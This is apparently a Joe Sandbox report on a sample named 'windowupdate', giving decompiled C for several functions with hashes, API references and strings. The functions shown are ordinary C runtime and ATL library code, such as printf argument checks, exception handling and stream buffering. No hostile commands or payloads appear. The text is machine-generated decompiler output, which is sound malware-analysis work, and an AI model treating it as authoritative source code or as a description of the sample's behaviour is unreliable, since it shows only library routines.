                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 54b29a80bc5762847f92008e8078f952d341d00c56f9e328aedc2a69aad33116
                      • Instruction ID: bcca19f9b00d06849b5a67482e62bae5bc852874000f7c1d9b7075bfc27e1044
                      • Opcode Fuzzy Hash: 54b29a80bc5762847f92008e8078f952d341d00c56f9e328aedc2a69aad33116
                      • Instruction Fuzzy Hash: 1CC13DB090421D8FDF28EF14CD91BAEB7B0AB51319F1441D9E94967281EB709E88CF79
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5D9D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v2744;
                      				signed int _v2748;
                      				char _v2752;
                      				char _v2756;
                      				signed int _v2760;
                      				char _v2764;
                      				char _v2768;
                      				intOrPtr _v2772;
                      				signed int _v2776;
                      				signed int _v2780;
                      				char _v2784;
                      				signed int _v2788;
                      				signed int _v2792;
                      				signed int _v2796;
                      				signed int _v2800;
                      				signed int _v2804;
                      				signed int _v2808;
                      				signed int _v2812;
                      				signed int _v2816;
                      				signed int _v2820;
                      				signed int _v2824;
                      				signed int _v2828;
                      				signed int _v2832;
                      				char _v2848;
                      				char _v2852;
                      				signed int _t117;
                      				void* _t125;
                      				signed int _t138;
                      				void* _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t212;
                      				void* _t213;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t160 = __ecx;
                      				_t159 = __ebx;
                      				_t117 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t117 ^ _t212;
                      				if(_a20 == 0) {
                      					_v2768 = 0;
                      				} else {
                      					_v2768 = 1;
                      				}
                      				_v2772 = _v2768;
                      				_t217 = _v2772;
                      				if(_v2772 == 0) {
                      					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t213 = _t213 + 0x18;
                      					if(_t158 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v2772 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v2776 = 1;
                      						L12:
                      						_v2780 = _v2776;
                      						__eflags = _v2780;
                      						if(__eflags == 0) {
                      							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t213 = _t213 + 0x18;
                      							__eflags = _t155 - 1;
                      							if(_t155 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v2780;
                      						if(_v2780 != 0) {
                      							L00D66CC0(_t159,  &_v2848, _t211, _a24);
                      							_v2764 = 0;
                      							_v2760 = 0;
                      							_v2756 = 0;
                      							_v2752 = 0;
                      							_v2764 = _a12;
                      							_v2760 = _a16;
                      							_v2756 = 0;
                      							_v2816 = _a4 & 0x00000002;
                      							_v2812 = _a8 & 0x00000000;
                      							__eflags = _v2816 | _v2812;
                      							if((_v2816 | _v2812) != 0) {
                      								L20:
                      								_v2784 = 1;
                      								L21:
                      								_v2752 = _v2784;
                      								_t125 = E00D67A60( &_v2848);
                      								E00D66AC0( &_v2744, E00D66C80( &_v2852,  &_v2764), _a4, _a8, _a20, _t125, _a28);
                      								_v2748 = E00D6AB00( &_v2744, _t210);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v2824 = _a4 & 0x00000001;
                      									_v2820 = _a8 & 0x00000000;
                      									__eflags = _v2824 | _v2820;
                      									if((_v2824 | _v2820) == 0) {
                      										_v2832 = _a4 & 0x00000002;
                      										_v2828 = _a8 & 0x00000000;
                      										_t207 = _v2832 | _v2828;
                      										__eflags = _v2832 | _v2828;
                      										if((_v2832 | _v2828) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v2756 - _a16;
                      												if(_v2756 != _a16) {
                      													_t207 = _a12 + _v2756;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      													L47:
                      													_v2808 = _v2748;
                      													E00D67030( &_v2744);
                      													E00D67230( &_v2848);
                      													_t138 = _v2808;
                      													goto L48;
                      												}
                      												 *((char*)(_a12 + _a16 - 1)) = 0;
                      												_v2804 = 0xfffffffe;
                      												E00D67030( &_v2744);
                      												E00D67230( &_v2848);
                      												_t138 = _v2804;
                      												goto L48;
                      											}
                      											_v2800 = 0xffffffff;
                      											E00D67030( &_v2744);
                      											E00D67230( &_v2848);
                      											_t138 = _v2800;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v2748;
                      											if(_v2748 >= 0) {
                      												__eflags = _v2756 - _a16;
                      												if(_v2756 != _a16) {
                      													_t207 = _a12 + _v2756;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      												} else {
                      													 *((char*)(_a12 + _a16 - 1)) = 0;
                      												}
                      											} else {
                      												_t207 = _a12;
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v2756 - _a16;
                      										if(_v2756 == _a16) {
                      											__eflags = _v2748;
                      											if(_v2748 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											_t207 = _v2748;
                      											__eflags = _v2748 - _a16;
                      											if(_v2748 <= _a16) {
                      												goto L32;
                      											}
                      											_v2796 = 0xffffffff;
                      											E00D67030( &_v2744);
                      											E00D67230( &_v2848);
                      											_t138 = _v2796;
                      											goto L48;
                      										}
                      										 *(_a12 + _v2756) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v2748;
                      									if(_v2748 == 0) {
                      										goto L27;
                      									}
                      									_v2792 = 0xffffffff;
                      									E00D67030( &_v2744);
                      									E00D67230( &_v2848);
                      									_t138 = _v2792;
                      									goto L48;
                      								}
                      								_t207 = _v2748;
                      								_v2788 = _v2748;
                      								E00D67030( &_v2744);
                      								E00D67230( &_v2848);
                      								_t138 = _v2788;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v2784 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v2776 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}


                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5DBC9
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 68e06a79ce3a42349502befe7303cfe682032314c93ab5b01161dad75a2444ea
                      • Instruction ID: e2d6d391970878d1d2743c4c5841099b786e3a53b18351e9b4025b878146dbc9
                      • Opcode Fuzzy Hash: 68e06a79ce3a42349502befe7303cfe682032314c93ab5b01161dad75a2444ea
                      • Instruction Fuzzy Hash: 25C1F570A0435D8BDF34DF18CC51BAAB7B2BB15319F1441D9E80A6A681DB749E88CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D45360(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				char _v32;
                      				intOrPtr _t86;
                      				void* _t88;
                      				void* _t93;
                      				void* _t101;
                      				void* _t109;
                      				void* _t115;
                      				void* _t117;
                      				void* _t120;
                      				signed int _t160;
                      				void* _t181;
                      				void* _t182;
                      
                      				_t180 = __esi;
                      				_t179 = __edi;
                      				_t160 = __edx;
                      				_t121 = __ebx;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_v16 = 1;
                      				_v32 = _a24;
                      				_t184 = _v32;
                      				if(_v32 == 0) {
                      					__eflags = _a8 - 0x110;
                      					if(__eflags != 0) {
                      						L5:
                      						__eflags = _a8 - 0x111;
                      						if(_a8 != 0x111) {
                      							L9:
                      							__eflags = _a8 - 0x111;
                      							if(_a8 != 0x111) {
                      								L13:
                      								__eflags = _a8 - 0x111;
                      								if(_a8 != 0x111) {
                      									L17:
                      									__eflags = _a8 - 0x111;
                      									if(_a8 != 0x111) {
                      										L21:
                      										__eflags = _a8 - 0x111;
                      										if(_a8 != 0x111) {
                      											L25:
                      											__eflags = _a8 - 0x111;
                      											if(_a8 != 0x111) {
                      												L29:
                      												L33:
                      												_t86 = 0;
                      												L34:
                      												_push(_t160);
                      												E00DC14C0(_t181, 0xd45684);
                      												_t88 = _t86;
                      												return E00DC1520(_t88, _t181 - _t182 + 0x1c);
                      											}
                      											_t160 = _a12 & 0x0000ffff;
                      											__eflags = (_t160 & 0x0000ffff) - 0xd2;
                      											if(__eflags != 0) {
                      												goto L29;
                      											}
                      											_v16 = 1;
                      											_t93 = E00DC0980(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      											_t160 = _a20;
                      											 *_t160 = _t93;
                      											__eflags = _v16;
                      											if(_v16 == 0) {
                      												goto L29;
                      											}
                      											_t86 = 1;
                      											goto L34;
                      										}
                      										__eflags = (_a12 & 0xffff) - 0xd4;
                      										if(__eflags != 0) {
                      											goto L25;
                      										}
                      										_v16 = 1;
                      										_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      										 *_a20 = E00DC0840(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      										__eflags = _v16;
                      										if(_v16 == 0) {
                      											goto L25;
                      										}
                      										_t86 = 1;
                      										goto L34;
                      									}
                      									_t160 = _a12 & 0x0000ffff;
                      									__eflags = (_t160 & 0x0000ffff) - 0xd3;
                      									if(__eflags != 0) {
                      										goto L21;
                      									}
                      									_v16 = 1;
                      									_t101 = E00DC0AC0(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      									_t160 = _a20;
                      									 *_t160 = _t101;
                      									__eflags = _v16;
                      									if(_v16 == 0) {
                      										goto L21;
                      									}
                      									_t86 = 1;
                      									goto L34;
                      								}
                      								__eflags = (_a12 & 0xffff) - 0xd1;
                      								if(__eflags != 0) {
                      									goto L17;
                      								}
                      								_v16 = 1;
                      								_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      								 *_a20 = E00DC0C00(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      								__eflags = _v16;
                      								if(_v16 == 0) {
                      									goto L17;
                      								}
                      								_t86 = 1;
                      								goto L34;
                      							}
                      							_t160 = _a12 & 0x0000ffff;
                      							__eflags = (_t160 & 0x0000ffff) - 2;
                      							if((_t160 & 0x0000ffff) != 2) {
                      								goto L13;
                      							}
                      							_v16 = 1;
                      							_t109 = E00DC0D40(_v8, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      							_t160 = _a20;
                      							 *_t160 = _t109;
                      							__eflags = _v16;
                      							if(_v16 == 0) {
                      								goto L13;
                      							}
                      							_t86 = 1;
                      							goto L34;
                      						}
                      						__eflags = (_a12 & 0xffff) - 1;
                      						if(__eflags != 0) {
                      							goto L9;
                      						}
                      						_v16 = 1;
                      						_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      						 *_a20 = E00DC0D90(_v8, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      						__eflags = _v16;
                      						if(_v16 == 0) {
                      							goto L9;
                      						}
                      						_t86 = 1;
                      						goto L34;
                      					}
                      					_v16 = 1;
                      					_t115 = E00DC0E20(__ebx, _v8, __edi, __esi, __eflags, _a8, _a12, _a16,  &_v16);
                      					_t160 = _a20;
                      					 *_t160 = _t115;
                      					__eflags = _v16;
                      					if(_v16 == 0) {
                      						goto L5;
                      					}
                      					_t86 = 1;
                      					goto L34;
                      				}
                      				_t117 = E00D3F1E0(0xf23748);
                      				E00D323E0(__ebx, __edi, __esi, _t184, E00D323B0( &_v28, "C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26), _t117, 0, "Invalid message map ID (%i)\n", _a24);
                      				_t182 = _t182 + 0x14;
                      				if(0 == 0) {
                      					_t120 = L00D84930(0, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26, 0, "%ls", 0xde40dc);
                      					_t182 = _t182 + 0x18;
                      					if(_t120 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				goto L33;
                      			}


                      APIs
                      • _Smanip.LIBCPMTD ref: 00D45629
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D4566A
                      Strings
                      • Invalid message map ID (%i), xrefs: 00D4560D
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00D45621
                      • %ls, xrefs: 00D45640
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00D45649
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8$Smanip
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$Invalid message map ID (%i)
                      • API String ID: 3890940529-3131995353
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E00D38100(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, signed int _a8, intOrPtr _a12, CHAR** _a16) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				CHAR** _v16;
                      				CHAR* _v20;
                      				CHAR* _v24;
                      				intOrPtr _v28;
                      				char _v64;
                      				CHAR* _v72;
                      				CHAR* _v76;
                      				char _v84;
                      				signed int _t64;
                      				CHAR* _t70;
                      				void* _t72;
                      				CHAR* _t81;
                      				CHAR* _t83;
                      				CHAR* _t87;
                      				CHAR* _t95;
                      				void* _t100;
                      				intOrPtr _t104;
                      				signed int _t106;
                      				CHAR* _t132;
                      				void* _t134;
                      				void* _t141;
                      				void* _t142;
                      				signed int _t144;
                      				void* _t145;
                      				void* _t146;
                      
                      				_t143 = __esi;
                      				_t100 = __ebx;
                      				_push(__ecx);
                      				_t141 =  &_v84;
                      				memset(_t141, 0xcccccccc, 0x14 << 2);
                      				_t146 = _t145 + 0xc;
                      				_t142 = _t141 + 0x14;
                      				_pop(_t104);
                      				_t64 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t64 ^ _t144;
                      				_v12 = _t104;
                      				if(_a16 != 0) {
                      					_v16 = _a16;
                      					_t132 =  *(_a4 + _a8 * 8);
                      					 *_v16 = _t132;
                      					__eflags =  *_v16;
                      					if( *_v16 != 0) {
                      						_t106 = _a8;
                      						_t132 = _a4;
                      						__eflags = _t132[4 + _t106 * 8] & 0x000000ff;
                      						if((_t132[4 + _t106 * 8] & 0x000000ff) == 0) {
                      							L25:
                      							_t70 = 0;
                      							__eflags = 0;
                      						} else {
                      							E00D3E030(_a12);
                      							_v20 =  *_v16;
                      							 *_v16 = 0;
                      							while(1) {
                      								_t132 =  *_v20;
                      								__eflags = _t132;
                      								if(_t132 == 0) {
                      									break;
                      								}
                      								__eflags =  *_v20 - 0x25;
                      								if( *_v20 != 0x25) {
                      									E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
                      									goto L23;
                      								} else {
                      									_t143 = _t146;
                      									_t132 = _v20;
                      									_t83 = CharNextA(_t132);
                      									__eflags = _t146 - _t146;
                      									_v20 = E00DC1520(_t83, _t146 - _t146);
                      									_t117 =  *_v20;
                      									__eflags =  *_v20 - 0x25;
                      									if( *_v20 != 0x25) {
                      										_t87 = E00D41F90(_t117, _v20, 0x25);
                      										_t146 = _t146 + 8;
                      										_v24 = _t87;
                      										__eflags = _v24;
                      										if(__eflags != 0) {
                      											_v28 = _v24 - _v20;
                      											__eflags = _v28 - 0x1f;
                      											if(__eflags <= 0) {
                      												E00D32750(_t100, _t142, _t143, __eflags,  &_v64, 0x20, _v20, _v28);
                      												_t146 = _t146 + 0x10;
                      												_t132 =  &_v64;
                      												_v72 = E00D373F0(_v12 + 4, _t143, __eflags, _t132);
                      												__eflags = _v72;
                      												if(_v72 != 0) {
                      													_v76 = 0;
                      													while(1) {
                      														__eflags = _v72[_v76];
                      														if(_v72[_v76] == 0) {
                      															break;
                      														}
                      														E00D3E0B0(_t100, _a12, _t142, _t143,  &(_v72[_v76]));
                      														_t95 =  &(_v76[1]);
                      														__eflags = _t95;
                      														_v76 = _t95;
                      													}
                      													_v20 = _v24;
                      													goto L21;
                      												} else {
                      													_t70 = 0x80004005;
                      												}
                      											} else {
                      												_t70 = 0x80004005;
                      											}
                      										} else {
                      											_push("Error : closing \'%%\' found\n");
                      											_push(0);
                      											_push(E00D3F1F0(0xf237ac));
                      											_push(E00D323B0( &_v84, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x170));
                      											E00D323E0(_t100, _t142, _t143, __eflags);
                      											_t146 = _t146 + 0x10;
                      											_t70 = 0x80004005;
                      										}
                      									} else {
                      										E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
                      										L21:
                      										L23:
                      										_t143 = _t146;
                      										_t81 = CharNextA(_v20);
                      										__eflags = _t146 - _t146;
                      										_v20 = E00DC1520(_t81, _t146 - _t146);
                      										continue;
                      									}
                      								}
                      								goto L26;
                      							}
                      							E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
                      							goto L25;
                      						}
                      					} else {
                      						_t70 = 1;
                      					}
                      				} else {
                      					_t70 = 0x80070057;
                      				}
                      				L26:
                      				E00DC14C0(_t144, 0xd38310);
                      				_t72 = _t70;
                      				_t134 = _t132;
                      				return E00DC1520(E00D47280(_t72, _t100, _v8 ^ _t144, _t134, _t142, _t143), _t144 - _t146 + 0x50);
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D382EA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D38205
                      • Error : closing '%%' found, xrefs: 00D381EE
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Error : closing '%%' found
                      • API String ID: 930174750-1365711956
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00D49CD0(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed char _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				signed char _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _t127;
                      				void* _t149;
                      				void* _t152;
                      
                      				_v5 = 0;
                      				_v48 = 1;
                      				 *_a4 = E00DBF650( *_a4);
                      				_v12 = _a8 - 8;
                      				_v16 = _v12 + 0x18;
                      				_v24 =  *(_v12 + 0x10) ^  *0xdf600c;
                      				E00D49C70(_v24, _v16);
                      				E00D4E290(_v16, _a12);
                      				_t152 = _t149 + 0x10;
                      				if(( *(_a4 + 4) & 0x00000066) != 0) {
                      					if( *((intOrPtr*)(_v12 + 0x14)) != 0xfffffffe) {
                      						E00D4E4E0(_v12 + 8, 0xfffffffe, _v16, 0xdf600c);
                      						_v5 = 1;
                      					}
                      					goto L19;
                      				} else {
                      					_v56 = _a4;
                      					_v52 = _a12;
                      					 *((intOrPtr*)(_v12 + 4)) =  &_v56;
                      					_v20 =  *((intOrPtr*)(_v12 + 0x14));
                      					while(_v20 != 0xfffffffe) {
                      						_v28 = _v24 + 0x10 + _v20 * 0xc;
                      						_v32 =  *((intOrPtr*)(_v28 + 4));
                      						_v44 =  *_v28;
                      						if(_v32 == 0) {
                      							L15:
                      							_v20 = _v44;
                      							continue;
                      						}
                      						_v36 = E00D4E480(_v32, _v16);
                      						_v5 = 1;
                      						if(_v36 >= 0) {
                      							if(_v36 > 0) {
                      								if( *_a4 == 0xe06d7363 &&  *0xdc8790 != 0) {
                      									_t96 = E00DBEA70(0xdc8790);
                      									_t152 = _t152 + 4;
                      									if(_t96 != 0) {
                      										_t127 =  *0xdc8790; // 0xd4b0e0
                      										_v40 = _t127;
                      										 *0xdc62b0(_a4, 1);
                      										_t96 = _v40();
                      										_t152 = _t152 + 8;
                      									}
                      								}
                      								E00D4E4C0(_t96, _v12 + 8, _a4);
                      								if( *((intOrPtr*)(_v12 + 0x14)) != _v20) {
                      									E00D4E4E0(_v12 + 8, _v20, _v16, 0xdf600c);
                      								}
                      								 *((intOrPtr*)(_v12 + 0x14)) = _v44;
                      								E00D49C70(_v24, _v16);
                      								_t152 = _t152 + 8;
                      								E00D4E4A0();
                      							}
                      							goto L15;
                      						}
                      						_v48 = 0;
                      						break;
                      					}
                      					L19:
                      					if((_v5 & 0x000000ff) != 0) {
                      						E00D49C70(_v24, _v16);
                      					}
                      					return _v48;
                      				}
                      			}

                      APIs
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49D1D
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00D49D29
                        • Part of subcall function 00D4E290: __guard_icall_checks_enforced.LIBCMTD ref: 00D4E296
                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00D49DE5
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49E50
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                      • String ID: csm
                      • API String ID: 3439031638-1018135373
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00D99120(intOrPtr _a4) {
                      				char _v8;
                      				signed int* _v12;
                      				char _v16;
                      				void* _t37;
                      				void* _t38;
                      				void* _t39;
                      				void* _t40;
                      				void* _t41;
                      				signed char _t43;
                      				void* _t52;
                      				void* _t54;
                      				void* _t65;
                      				intOrPtr _t89;
                      				void* _t100;
                      				void* _t102;
                      				void* _t103;
                      
                      				_t105 = _a4;
                      				if(_a4 == 0) {
                      					_t65 = L00D84930(_t105, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x26, 0, L"%ls", L"public_stream != nullptr");
                      					_t100 = _t100 + 0x18;
                      					if(_t65 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00D66E20( &_v8, _a4);
                      				_t37 = E00DADA70( &_v8, E00D98780(E00D6C080( &_v8)));
                      				_t102 = _t100 + 8;
                      				if(_t37 != 0) {
                      					_t38 = E00D6C080( &_v8);
                      					_t39 = E00D98A50(1);
                      					_t103 = _t102 + 4;
                      					__eflags = _t38 - _t39;
                      					if(_t38 != _t39) {
                      						_t40 = E00D6C080( &_v8);
                      						_t41 = E00D98A50(2);
                      						_t103 = _t103 + 4;
                      						__eflags = _t40 - _t41;
                      						if(_t40 != _t41) {
                      							return 0;
                      						}
                      						_v12 = 0xf21190;
                      						L10:
                      						_t89 =  *0xf21184; // 0x0
                      						 *0xf21184 = _t89 + 1;
                      						_t43 = E00D99000( &_v8);
                      						__eflags = _t43 & 0x000000ff;
                      						if((_t43 & 0x000000ff) == 0) {
                      							E00D99080( &_v8, 0x282);
                      							__eflags =  *_v12;
                      							if( *_v12 == 0) {
                      								 *_v12 = E00D8C129(E00D4BF60( &_v16, E00D89580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x40)));
                      								E00D4BFA0( &_v16);
                      							}
                      							__eflags =  *_v12;
                      							if( *_v12 != 0) {
                      								(E00D67320( &_v8))[1] =  *_v12;
                      								 *(E00D67320( &_v8)) =  *_v12;
                      								(E00D67320( &_v8))[2] = 0x1000;
                      								(E00D67320( &_v8))[6] = 0x1000;
                      								return 1;
                      							} else {
                      								_t52 = E00D67320( &_v8);
                      								(E00D67320( &_v8))[1] = _t52 + 0x14;
                      								_t54 = E00D67320( &_v8);
                      								 *(E00D67320( &_v8)) = _t54 + 0x14;
                      								(E00D67320( &_v8))[2] = 2;
                      								(E00D67320( &_v8))[6] = 2;
                      								return 1;
                      							}
                      						}
                      						return 0;
                      					}
                      					_v12 = 0xf2118c;
                      					goto L10;
                      				} else {
                      					return 0;
                      				}
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D99159
                      • __wcstombs_l.LIBCMTD ref: 00D99214
                        • Part of subcall function 00D4BFA0: __crt_unique_heap_ptr.LIBCMTD ref: 00D4BFAA
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00D9913D
                      • public_stream != nullptr, xrefs: 00D9912F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00D99208
